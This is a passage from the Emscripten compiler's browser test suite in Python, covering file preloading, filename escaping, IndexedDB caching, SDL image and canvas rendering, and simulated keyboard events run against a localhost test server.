s.send_header("Accept-Ranges", "bytes") for i in extra: s.send_header(i[0], i[1]) s.end_headers() def do_HEAD(s): s.sendheaders() def do_OPTIONS(s): s.sendheaders([("Access-Control-Allow-Headers", "Range")], 0) def do_GET(s): if s.path == '/': s.sendheaders() elif not support_byte_ranges: s.sendheaders() s.wfile.write(data) else: start, end = s.headers.get("range").split("=")[1].split("-") start = int(start) end = int(end) end = min(len(data) - 1, end) length = end - start + 1 s.sendheaders([], length) s.wfile.write(data[start:end + 1]) # CORS preflight makes OPTIONS requests which we need to account for. expectedConns = 22 httpd = HTTPServer(('localhost', 11111), ChunkedServerHandler) for i in range(expectedConns + 1): httpd.handle_request() def also_with_wasmfs(f): def metafunc(self, wasmfs, *args, **kwargs): if wasmfs: self.set_setting('WASMFS') self.emcc_args = self.emcc_args.copy() + ['-DWASMFS'] f(self, *args, **kwargs) else: f(self, *args, **kwargs) metafunc._parameterize = {'': (False,), 'wasmfs': (True,)} return metafunc def also_with_wasm2js(f): assert callable(f) def metafunc(self, with_wasm2js): assert self.get_setting('WASM') is None if with_wasm2js: self.set_setting('WASM', 0) f(self) else: f(self) metafunc._parameterize = {'': (False,), 'wasm2js': (True,)} return metafunc def shell_with_script(shell_file, output_file, replacement): shell = read_file(path_from_root('src', shell_file)) create_file(output_file, shell.replace('{{{ SCRIPT }}}', replacement)) def is_chrome(): return EMTEST_BROWSER and 'chrom' in EMTEST_BROWSER.lower() def no_chrome(note='chrome is not supported'): if is_chrome(): return unittest.skip(note) return lambda f: f def is_firefox(): return EMTEST_BROWSER and 'firefox' in EMTEST_BROWSER.lower() def no_firefox(note='firefox is not supported'): if is_firefox(): return unittest.skip(note) return lambda f: f def no_swiftshader(f): assert callable(f) def decorated(self, *args, **kwargs): if is_chrome() and '--use-gl=swiftshader' in EMTEST_BROWSER: self.skipTest('not compatible with swiftshader') return f(self, *args, **kwargs) return decorated def requires_threads(f): assert callable(f) def decorated(self, *args, **kwargs): if os.environ.get('EMTEST_LACKS_THREAD_SUPPORT'): self.skipTest('EMTEST_LACKS_THREAD_SUPPORT is set') return f(self, *args, **kwargs) return decorated def also_with_threads(f): def decorated(self, *args, **kwargs): f(self) if not os.environ.get('EMTEST_LACKS_THREAD_SUPPORT'): print('(threads)') self.emcc_args += ['-pthread'] f(self, *args, **kwargs) return decorated requires_graphics_hardware = unittest.skipIf(os.getenv('EMTEST_LACKS_GRAPHICS_HARDWARE'), "This test requires graphics hardware") requires_sound_hardware = unittest.skipIf(os.getenv('EMTEST_LACKS_SOUND_HARDWARE'), "This test requires sound hardware") requires_sync_compilation = unittest.skipIf(is_chrome(), "This test requires synchronous compilation, which does not work in Chrome (except for tiny wasms)") requires_offscreen_canvas = unittest.skipIf(os.getenv('EMTEST_LACKS_OFFSCREEN_CANVAS'), "This test requires a browser with OffscreenCanvas") class browser(BrowserCore): @classmethod def setUpClass(cls): super().setUpClass() cls.browser_timeout = 60 if EMTEST_BROWSER != 'node': print() print('Running the browser tests. Make sure the browser allows popups from localhost.') print() def setUp(self): super().setUp() # avoid various compiler warnings that many browser tests currently generate self.emcc_args += [ '-Wno-pointer-sign', '-Wno-int-conversion', ] def test_sdl1_in_emscripten_nonstrict_mode(self): if 'EMCC_STRICT' in os.environ and int(os.environ['EMCC_STRICT']): self.skipTest('This test requires being run in non-strict mode (EMCC_STRICT env. variable unset)') # TODO: This test is verifying behavior that will be deprecated at some point in the future, remove this test once # system JS libraries are no longer automatically linked to anymore. self.btest('hello_world_sdl.cpp', reference='htmltest.png') def test_sdl1(self): self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-lSDL', '-lGL']) self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-sUSE_SDL', '-lGL']) # is the default anyhow def test_sdl1_es6(self): self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-sUSE_SDL', '-lGL', '-sEXPORT_ES6']) # Deliberately named as test_zzz_* to make this test the last one # as this test may take the focus away from the main test window # by opening a new window and possibly not closing it. def test_zzz_html_source_map(self): if not has_browser(): self.skipTest('need a browser') cpp_file = 'src.cpp' html_file = 'src.html' # browsers will try to 'guess' the corresponding original line if a # generated line is unmapped, so if we want to make sure that our # numbering is correct, we need to provide a couple of 'possible wrong # answers'. thus, we add some printf calls so that the cpp file gets # multiple mapped lines. in other words, if the program consists of a # single 'throw' statement, browsers may just map any thrown exception to # that line, because it will be the only mapped line. with open(cpp_file, 'w') as f: f.write(r''' #include <cstdio> int main() { printf("Starting test\n"); try { throw 42; // line 8 } catch (int e) { } printf("done\n"); return 0; } ''') # use relative paths when calling emcc, because file:// URIs can only load # sourceContent when the maps are relative paths try_delete(html_file) try_delete(html_file + '.map') self.compile_btest(['src.cpp', '-o', 'src.html', '-gsource-map']) self.assertExists(html_file) self.assertExists('src.wasm.map') webbrowser.open_new('file://' + html_file) print(''' If manually bisecting: Check that you see src.cpp among the page sources. Even better, add a breakpoint, e.g. on the printf, then reload, then step through and see the print (best to run with --save-dir for the reload). ''') def test_emscripten_log(self): self.btest_exit(test_file('emscripten_log/emscripten_log.cpp'), args=['--pre-js', path_from_root('src/emscripten-source-map.min.js'), '-gsource-map']) @also_with_wasmfs def test_preload_file(self): create_file('somefile.txt', 'load me right before running the code please') create_file('.somefile.txt', 'load me right before running the code please') create_file('some@file.txt', 'load me right before running the code please') absolute_src_path = os.path.abspath('somefile.txt') def make_main(path): print('make main at', path) path = path.replace('\\', '\\\\').replace('"', '\\"') # Escape tricky path name for use inside a C string. # TODO: change this when wasmfs supports relative paths. if self.get_setting('WASMFS'): path = "/" + path create_file('main.cpp', r''' #include <assert.h> #include <stdio.h> #include <string.h> #include <emscripten.h> int main() { FILE *f = fopen("%s", "r"); char buf[100]; fread(buf, 1, 20, f); buf[20] = 0; fclose(f); printf("|%%s|\n", buf); assert(strcmp("load me right before", buf) == 0); return 0; } ''' % path) test_cases = [ # (source preload-file string, file on target FS to load) ("somefile.txt", "somefile.txt"), (".somefile.txt@somefile.txt", "somefile.txt"), ("./somefile.txt", "somefile.txt"), ("somefile.txt@file.txt", "file.txt"), ("./somefile.txt@file.txt", "file.txt"), ("./somefile.txt@./file.txt", "file.txt"), ("somefile.txt@/file.txt", "file.txt"), ("somefile.txt@/", "somefile.txt"), (absolute_src_path + "@file.txt", "file.txt"), (absolute_src_path + "@/file.txt", "file.txt"), (absolute_src_path + "@/", "somefile.txt"), ("somefile.txt@/directory/file.txt", "/directory/file.txt"), ("somefile.txt@/directory/file.txt", "directory/file.txt"), (absolute_src_path + "@/directory/file.txt", "directory/file.txt"), ("some@@file.txt@other.txt", "other.txt"), ("some@@file.txt@some@@otherfile.txt", "some@otherfile.txt")] for srcpath, dstpath in test_cases: print('Testing', srcpath, dstpath) make_main(dstpath) self.btest_exit('main.cpp', args=['--preload-file', srcpath]) if WINDOWS: # On Windows, the following non-alphanumeric non-control code ASCII characters are supported. # The characters <, >, ", |, ?, * are not allowed, because the Windows filesystem doesn't support those. tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~.txt' else: # All 7-bit non-alphanumeric non-control code ASCII characters except /, : and \ are allowed. tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~ "*<>?|.txt' create_file(tricky_filename, 'load me right before running the code please') make_main(tricky_filename) # As an Emscripten-specific feature, the character '@' must be escaped in the form '@@' to not confuse with the 'src@dst' notation. self.btest_exit('main.cpp', args=['--preload-file', tricky_filename.replace('@', '@@')]) # TODO: WASMFS doesn't support the rest of this test yet. Exit early. if self.get_setting('WASMFS'): return # By absolute path make_main('somefile.txt') # absolute becomes relative self.btest_exit('main.cpp', args=['--preload-file', absolute_src_path]) # Test subdirectory handling with asset packaging. try_delete('assets') ensure_dir('assets/sub/asset1/'.replace('\\', '/')) ensure_dir('assets/sub/asset1/.git'.replace('\\', '/')) # Test adding directory that shouldn't exist. ensure_dir('assets/sub/asset2/'.replace('\\', '/')) create_file('assets/sub/asset1/file1.txt', '''load me right before running the code please''') create_file('assets/sub/asset1/.git/shouldnt_be_embedded.txt', '''this file should not get embedded''') create_file('assets/sub/asset2/file2.txt', '''load me right before running the code please''') absolute_assets_src_path = 'assets'.replace('\\', '/') def make_main_two_files(path1, path2, nonexistingpath): create_file('main.cpp', r''' #include <stdio.h> #include <assert.h> #include <string.h> #include <emscripten.h> int main() { FILE *f = fopen("%s", "r"); char buf[100]; fread(buf, 1, 20, f); buf[20] = 0; fclose(f); printf("|%%s|\n", buf); assert(strcmp("load me right before", buf) == 0); f = fopen("%s", "r"); assert(f != NULL); fclose(f); f = fopen("%s", "r"); assert(f == NULL); return 0; } ''' % (path1, path2, nonexistingpath)) test_cases = [ # (source directory to embed, file1 on target FS to load, file2 on target FS to load, name of a file that *shouldn't* exist on VFS) ("assets", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"), ("assets/", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"), ("assets@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"), ("assets/@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"), ("assets@./", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"), (absolute_assets_src_path + "@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"), (absolute_assets_src_path + "@/assets", "/assets/sub/asset1/file1.txt", "/assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt")] for test in test_cases: (srcpath, dstpath1, dstpath2, nonexistingpath) = test make_main_two_files(dstpath1, dstpath2, nonexistingpath) print(srcpath) self.btest_exit('main.cpp', args=['--preload-file', srcpath, '--exclude-file', '*/.*']) # Should still work with -o subdir/.. make_main('somefile.txt') # absolute becomes relative ensure_dir('dirrey') self.compile_btest(['main.cpp', '--preload-file', absolute_src_path, '-o', 'dirrey/page.html'], reporting=Reporting.JS_ONLY) self.run_browser('dirrey/page.html', 'You should see |load me right before|.', '/report_result?exit:0') # With FS.preloadFile create_file('pre.js', ''' Module.preRun = function() { FS.createPreloadedFile('/', 'someotherfile.txt', 'somefile.txt', true, false); // we need --use-preload-plugins for this. }; ''') make_main('someotherfile.txt') self.btest_exit('main.cpp', args=['--pre-js', 'pre.js', '--use-preload-plugins']) # Tests that user .html shell files can manually download .data files created with --preload-file cmdline. @parameterized({ 'default': ([],), 'pthreads': (['-pthread', '-sPROXY_TO_PTHREAD', '-sEXIT_RUNTIME'],), }) @requires_threads def test_preload_file_with_manual_data_download(self, args): src = test_file('manual_download_data.cpp') create_file('file.txt', '''Hello!''') self.compile_btest([src, '-o', 'manual_download_data.js', '--preload-file', 'file.txt@/file.txt'] + args) shutil.copyfile(test_file('manual_download_data.html'), 'manual_download_data.html') # Move .data file out of server root to ensure that getPreloadedPackage is actually used os.mkdir('test') shutil.move('manual_download_data.data', 'test/manual_download_data.data') self.run_browser('manual_download_data.html', 'Hello!', '/report_result?1') # Tests that if the output files have single or double quotes in them, that it will be handled by # correctly escaping the names. def test_output_file_escaping(self): self.set_setting('EXIT_RUNTIME') tricky_part = '\'' if WINDOWS else '\' and \"' # On Windows, files/directories may not contain a double quote character. On non-Windowses they can, so test that. d = 'dir with ' + tricky_part abs_d = os.path.abspath(d) ensure_dir(abs_d) txt = 'file with ' + tricky_part + '.txt' create_file(os.path.join(d, txt), 'load me right before') cpp = os.path.join(d, 'file with ' + tricky_part + '.cpp') create_file(cpp, r''' #include <assert.h> #include <stdio.h> #include <string.h> #include <emscripten.h> int main() { FILE *f = fopen("%s", "r"); char buf[100]; fread(buf, 1, 20, f); buf[20] = 0; fclose(f); printf("|%%s|\n", buf); assert(strcmp("load me right before", buf) == 0); return 0; } ''' % (txt.replace('\'', '\\\'').replace('\"', '\\"'))) data_file = os.path.join(abs_d, 'file with ' + tricky_part + '.data') data_js_file = os.path.join(abs_d, 'file with ' + tricky_part + '.js') abs_txt = os.path.join(abs_d, txt) self.run_process([FILE_PACKAGER, data_file, '--use-preload-cache', '--indexedDB-name=testdb', '--preload', abs_txt + '@' + txt, '--js-output=' + data_js_file]) page_file = os.path.join(d, 'file with ' + tricky_part + '.html') abs_page_file = os.path.abspath(page_file) self.compile_btest([cpp, '--pre-js', data_js_file, '-o', abs_page_file, '-sFORCE_FILESYSTEM'], reporting=Reporting.JS_ONLY) self.run_browser(page_file, '|load me right before|.', '/report_result?exit:0') @parameterized({ '0': (0,), '1mb': (1 * 1024 * 1024,), '100mb': (100 * 1024 * 1024,), '150mb': (150 * 1024 * 1024,), }) def test_preload_caching(self, extra_size): self.set_setting('EXIT_RUNTIME') create_file('main.c', r''' #include <assert.h> #include <stdio.h> #include <string.h> #include <emscripten.h> extern int checkPreloadResults(); int main(int argc, char** argv) { FILE *f = fopen("%s", "r"); char buf[100]; fread(buf, 1, 20, f); buf[20] = 0; fclose(f); printf("|%%s|\n", buf); assert(strcmp("load me right before", buf) == 0); return checkPreloadResults(); } ''' % 'somefile.txt') create_file('test.js', ''' mergeInto(LibraryManager.library, { checkPreloadResults: function() { var cached = 0; var packages = Object.keys(Module['preloadResults']); packages.forEach(function(package) { var fromCache = Module['preloadResults'][package]['fromCache']; if (fromCache) ++ cached; }); return cached; } }); ''') # test caching of various sizes, including sizes higher than 128MB which is # chrome's limit on IndexedDB item sizes, see # https://cs.chromium.org/chromium/src/content/renderer/indexed_db/webidbdatabase_impl.cc?type=cs&q=%22The+serialized+value+is+too+large%22&sq=package:chromium&g=0&l=177 # https://cs.chromium.org/chromium/src/out/Debug/gen/third_party/blink/public/mojom/indexeddb/indexeddb.mojom.h?type=cs&sq=package:chromium&g=0&l=60 if is_chrome() and extra_size >= 100 * 1024 * 1024: self.skipTest('chrome bug') create_file('somefile.txt', '''load me right before running the code please''' + ('_' * extra_size)) print('size:', os.path.getsize('somefile.txt')) self.compile_btest(['main.c', '--use-preload-cache', '--js-library', 'test.js', '--preload-file', 'somefile.txt', '-o', 'page.html', '-sALLOW_MEMORY_GROWTH'], reporting=Reporting.JS_ONLY) self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?exit:0') self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?exit:1') def test_preload_caching_indexeddb_name(self): self.set_setting('EXIT_RUNTIME') create_file('somefile.txt', '''load me right before running the code please''') def make_main(path): print(path) create_file('main.c', r''' #include <assert.h> #include <stdio.h> #include <string.h> #include <emscripten.h> extern int checkPreloadResults(); int main(int argc, char** argv) { FILE *f = fopen("%s", "r"); char buf[100]; fread(buf, 1, 20, f); buf[20] = 0; fclose(f); printf("|%%s|\n", buf); int result = 0; assert(strcmp("load me right before", buf) == 0); return checkPreloadResults(); } ''' % path) create_file('test.js', ''' mergeInto(LibraryManager.library, { checkPreloadResults: function() { var cached = 0; var packages = Object.keys(Module['preloadResults']); packages.forEach(function(package) { var fromCache = Module['preloadResults'][package]['fromCache']; if (fromCache) ++ cached; }); return cached; } }); ''') make_main('somefile.txt') self.run_process([FILE_PACKAGER, 'somefile.data', '--use-preload-cache', '--indexedDB-name=testdb', '--preload', 'somefile.txt', '--js-output=' + 'somefile.js']) self.compile_btest(['main.c', '--js-library', 'test.js', '--pre-js', 'somefile.js', '-o', 'page.html', '-sFORCE_FILESYSTEM'], reporting=Reporting.JS_ONLY) self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?exit:0') self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?exit:1') def test_multifile(self): # a few files inside a directory ensure_dir('subdirr/moar') create_file('subdirr/data1.txt', '1214141516171819') create_file('subdirr/moar/data2.txt', '3.14159265358979') create_file('main.c', r''' #include <assert.h> #include <stdio.h> #include <string.h> #include <emscripten.h> int main() { char buf[17]; FILE *f = fopen("subdirr/data1.txt", "r"); fread(buf, 1, 16, f); buf[16] = 0; fclose(f); printf("|%s|\n", buf); assert(strcmp("1214141516171819", buf) == 0); FILE *f2 = fopen("subdirr/moar/data2.txt", "r"); fread(buf, 1, 16, f2); buf[16] = 0; fclose(f2); printf("|%s|\n", buf); assert(strcmp("3.14159265358979", buf) == 0); return 0; } ''') # by individual files self.btest_exit('main.c', args=['--preload-file', 'subdirr/data1.txt', '--preload-file', 'subdirr/moar/data2.txt']) # by directory, and remove files to make sure self.set_setting('EXIT_RUNTIME') self.compile_btest(['main.c', '--preload-file', 'subdirr', '-o', 'page.html'], reporting=Reporting.JS_ONLY) shutil.rmtree('subdirr') self.run_browser('page.html', 'You should see two cool numbers', '/report_result?exit:0') def test_custom_file_package_url(self): # a few files inside a directory ensure_dir('subdirr') ensure_dir('cdn') create_file(Path('subdirr/data1.txt'), '1214141516171819') # change the file package base dir to look in a "cdn". note that normally # you would add this in your own custom html file etc., and not by # modifying the existing shell in this manner default_shell = read_file(path_from_root('src/shell.html')) create_file('shell.html', default_shell.replace('var Module = {', ''' var Module = { locateFile: function(path, prefix) { if (path.endsWith(".wasm")) { return prefix + path; } else { return "cdn/" + path; } }, ''')) create_file('main.c', r''' #include <assert.h> #include <stdio.h> #include <string.h> #include <emscripten.h> int main() { char buf[17]; FILE *f = fopen("subdirr/data1.txt", "r"); fread(buf, 1, 16, f); buf[16] = 0; fclose(f); printf("|%s|\n", buf); assert(strcmp("1214141516171819", buf) == 0); return 0; } ''') self.set_setting('EXIT_RUNTIME') self.compile_btest(['main.c', '--shell-file', 'shell.html', '--preload-file', 'subdirr/data1.txt', '-o', 'test.html'], reporting=Reporting.JS_ONLY) shutil.move('test.data', Path('cdn/test.data')) self.run_browser('test.html', '', '/report_result?exit:0') def test_missing_data_throws_error(self): def setup(assetLocalization): self.clear() create_file('data.txt', 'data') create_file('main.cpp', r''' #include <stdio.h> #include <string.h> #include <emscripten.h> int main() { // This code should never be executed in terms of missing required dependency file. return 0; } ''') create_file('on_window_error_shell.html', r''' <html> <center><canvas id='canvas' width='256' height='256'></canvas></center> <hr><div id='output'></div><hr> <script type='text/javascript'> window.onerror = function(error) { window.disableErrorReporting = true; window.onerror = null; var result = error.indexOf("test.data") >= 0 ? 1 : 0; var xhr = new XMLHttpRequest(); xhr.open('GET', 'http://localhost:8888/report_result?' + result, true); xhr.send(); setTimeout(function() { window.close() }, 1000); } var Module = { locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "''' + assetLocalization + r'''" + path;}}, print: (function() { var element = document.getElementById('output'); return function(text) { element.innerHTML += text.replace('\n', '<br>', 'g') + '<br>';}; })(), canvas: document.getElementById('canvas') }; </script> {{{ SCRIPT }}} </body> </html>''') def test(): # test test missing file should run xhr.onload with status different than 200, 304 or 206 setup("") self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html']) shutil.move('test.data', 'missing.data') self.run_browser('test.html', '', '/report_result?1') # test unknown protocol should go through xhr.onerror setup("unknown_protocol://") self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html']) self.run_browser('test.html', '', '/report_result?1') # test wrong protocol and port setup("https://localhost:8800/") self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html']) self.run_browser('test.html', '', '/report_result?1') test() # TODO: CORS, test using a full url for locateFile # create_file('shell.html', read_file(path_from_root('src/shell.html')).replace('var Module = {', 'var Module = { locateFile: function (path) {return "http:/localhost:8888/cdn/" + path;}, ')) # test() @also_with_wasmfs def test_dev_random(self): self.btest_exit(Path('filesystem/dev_random.cpp')) def test_sdl_swsurface(self): self.btest_exit('sdl_swsurface.c', args=['-lSDL', '-lGL']) def test_sdl_surface_lock_opts(self): # Test Emscripten-specific extensions to optimize SDL_LockSurface and SDL_UnlockSurface. self.btest('hello_world_sdl.cpp', reference='htmltest.png', message='You should see "hello, world!" and a colored cube.', args=['-DTEST_SDL_LOCK_OPTS', '-lSDL', '-lGL']) def test_sdl_image(self): # load an image file, get pixel data. Also O2 coverage for --preload-file, and memory-init shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpg') src = test_file('sdl_image.c') for mem in [0, 1]: for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'), ('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]: self.btest_exit(src, args=[ '-O2', '-lSDL', '-lGL', '--memory-init-file', str(mem), '--preload-file', dest, '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"', '--use-preload-plugins' ]) @also_with_wasmfs def test_sdl_image_jpeg(self): shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpeg') src = test_file('sdl_image.c') self.btest_exit(src, args=[ '-lSDL', '-lGL', '--preload-file', 'screenshot.jpeg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"', '--use-preload-plugins' ]) def test_sdl_image_prepare(self): # load an image file, get pixel data. shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not') self.btest('sdl_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-lSDL', '-lGL'], also_proxied=True, manually_trigger_reftest=True) @parameterized({ '': ([],), # add testing for closure on preloaded files + ENVIRONMENT=web (we must not # emit any node.js code here, see # https://github.com/emscripten-core/emscripten/issues/14486 'closure_webonly': (['--closure', '1', '-sENVIRONMENT=web'],) }) def test_sdl_image_prepare_data(self, args): # load an image file, get pixel data. shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not') self.btest('sdl_image_prepare_data.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-lSDL', '-lGL'] + args, manually_trigger_reftest=True) def test_sdl_image_must_prepare(self): # load an image file, get pixel data. shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpg') self.btest('sdl_image_must_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.jpg', '-lSDL', '-lGL'], manually_trigger_reftest=True) def test_sdl_stb_image(self): # load an image file, get pixel data. shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not') self.btest('sdl_stb_image.c', reference='screenshot.jpg', args=['-sSTB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL']) def test_sdl_stb_image_bpp(self): # load grayscale image without alpha self.clear() shutil.copyfile(test_file('sdl-stb-bpp1.png'), 'screenshot.not') self.btest('sdl_stb_image.c', reference='sdl-stb-bpp1.png', args=['-sSTB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL']) # load grayscale image with alpha self.clear() shutil.copyfile(test_file('sdl-stb-bpp2.png'), 'screenshot.not') self.btest('sdl_stb_image.c', reference='sdl-stb-bpp2.png', args=['-sSTB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL']) # load RGB image self.clear() shutil.copyfile(test_file('sdl-stb-bpp3.png'), 'screenshot.not') self.btest('sdl_stb_image.c', reference='sdl-stb-bpp3.png', args=['-sSTB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL']) # load RGBA image self.clear() shutil.copyfile(test_file('sdl-stb-bpp4.png'), 'screenshot.not') self.btest('sdl_stb_image.c', reference='sdl-stb-bpp4.png', args=['-sSTB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL']) def test_sdl_stb_image_data(self): # load an image file, get pixel data. shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not') self.btest('sdl_stb_image_data.c', reference='screenshot.jpg', args=['-sSTB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL']) def test_sdl_stb_image_cleanup(self): shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not') self.btest_exit('sdl_stb_image_cleanup.c', args=['-sSTB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL', '--memoryprofiler']) def test_sdl_canvas(self): self.clear() self.btest_exit('sdl_canvas.c', args=['-sLEGACY_GL_EMULATION', '-lSDL', '-lGL']) # some extra coverage self.clear() self.btest_exit('sdl_canvas.c', args=['-sLEGACY_GL_EMULATION', '-O0', '-sSAFE_HEAP', '-lSDL', '-lGL']) self.clear() self.btest_exit('sdl_canvas.c', args=['-sLEGACY_GL_EMULATION', '-O2', '-sSAFE_HEAP', '-lSDL', '-lGL']) def post_manual_reftest(self, reference=None): self.reftest(test_file(self.reference if reference is None else reference)) html = read_file('test.html') html = html.replace('</body>', ''' <script> function assert(x, y) { if (!x) throw 'assertion failed ' + y } %s var windowClose = window.close; window.close = function() { // wait for rafs to arrive and the screen to update before reftesting setTimeout(function() { doReftest(); setTimeout(windowClose, 5000); }, 1000); }; </script> </body>''' % read_file('reftest.js')) create_file('test.html', html) def test_sdl_canvas_proxy(self): create_file('data.txt', 'datum') self.btest('sdl_canvas_proxy.c', reference='sdl_canvas_proxy.png', args=['--proxy-to-worker', '--preload-file', 'data.txt', '-lSDL', '-lGL'], manual_reference=True, post_build=self.post_manual_reftest) @requires_graphics_hardware def test_glgears_proxy_jstarget(self): # test .js target with --proxy-worker; emits 2 js files, client and worker self.compile_btest([test_file('hello_world_gles_proxy.c'), '-o', 'test.js', '--proxy-to-worker', '-sGL_TESTING', '-lGL', '-lglut']) shell_with_script('shell_minimal.html', 'test.html', '<script src="test.js"></script>') self.post_manual_reftest('gears.png') self.run_browser('test.html', None, '/report_result?0') def test_sdl_canvas_alpha(self): # N.B. On Linux with Intel integrated graphics cards, this test needs Firefox 49 or newer. # See https://github.com/emscripten-core/emscripten/issues/4069. create_file('flag_0.js', ''' Module['arguments'] = ['-0']; ''') self.btest('sdl_canvas_alpha.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_alpha.png', reference_slack=12) self.btest('sdl_canvas_alpha.c', args=['--pre-js', 'flag_0.js', '-lSDL', '-lGL'], reference='sdl_canvas_alpha_flag_0.png', reference_slack=12) def test_sdl_key(self): for delay in [0, 1]: for defines in [ [], ['-DTEST_EMSCRIPTEN_SDL_SETEVENTHANDLER'] ]: for async_ in [ [], ['-DTEST_SLEEP', '-sASSERTIONS', '-sSAFE_HEAP', '-sASYNCIFY'] ]: print(delay, defines, async_) create_file('pre.js', ''' function keydown(c) { %s var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true }); document.dispatchEvent(event); %s } function keyup(c) { %s var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true }); document.dispatchEvent(event); %s } ''' % ('setTimeout(function() {' if delay else '', '}, 1);' if delay else '', 'setTimeout(function() {' if delay else '', '}, 1);' if delay else '')) self.compile_btest([test_file('sdl_key.c'), '-o', 'page.html'] + defines + async_ + ['--pre-js', 'pre.js', '-sEXPORTED_FUNCTIONS=_main', '-lSDL', '-lGL']) self.run_browser('page.html', '', '/report_result?223092870') def test_sdl_key_proxy(self): create_file('pre.js', ''' var Module = {}; Module.postRun = function() { function doOne() { Module._one(); setTimeout(doOne, 1000/60); } setTimeout(doOne, 1000/60); } ''') def post(): html = read_file('test.html') html = html.replace('</body>', ''' <script> function keydown(c) { var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true }); document.dispatchEvent(event); } function keyup(c) { var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true }); document.dispatchEvent(event); } keydown(1250);keydown(38);keyup(38);keyup(1250); // alt, up keydown(1248);keydown(1249);keydown(40);keyup(40);keyup(1249);keyup(1248); // ctrl, shift, down keydown(37);keyup(37); // left keydown(39);keyup(39); // right keydown(65);keyup(65); // a keydown(66);keyup(66); // b keydown(100);keyup(100); // trigger the end </script> </body>''') create_file('test.html', html) self.btest('sdl_key_proxy.c', '223092870', args=['--proxy-to-worker', '--pre-js', 'pre.js', '-sEXPORTED_FUNCTIONS=_main,_one', '-lSDL', '-lGL'], manual_reference=True, post_build=post) def test_canvas_focus(self): self.btest_exit('canvas_focus.c') def test_keydown_preventdefault_proxy(self): def post(): html = read_file('test.html') html = html.replace('</body>', ''' <script> function keydown(c) { var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true }); return document.dispatchEvent(event); } function keypress(c) { var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true }); return document.dispatchEvent(event); } function keyup(c) { var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true }); return document.dispatchEvent(event); } function sendKey(c) { // Simulate the sending of the keypress event when the // prior keydown event is not prevent defaulted. if (keydown(c) === false) { console.log('keydown prevent defaulted, NOT sending keypress!!!'); } else { keypress(c); } keyup(c); } // Send 'a'. Simulate the sending of the keypress event when the // prior keydown event is not prevent defaulted. sendKey(65); // Send backspace. Keypress should not be sent over as default handling of // the Keydown event should be prevented. sendKey(8); keydown(100);keyup(100); // trigger the end </script> </body>''') create_file('test.html', html) self.btest('keydown_preventdefault_proxy.cpp', '300', args=['--proxy-to-worker', '-sEXPORTED_FUNCTIONS=_main'], manual_reference=True, post_build=post) def test_sdl_text(self): create_file('pre.js', ''' Module.postRun = function() { function doOne() { Module._one(); setTimeout(doOne, 1000/60); } setTimeout(doOne, 1000/60); } function simulateKeyEvent(c) { var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true }); document.body.dispatchEvent(event); } ''') 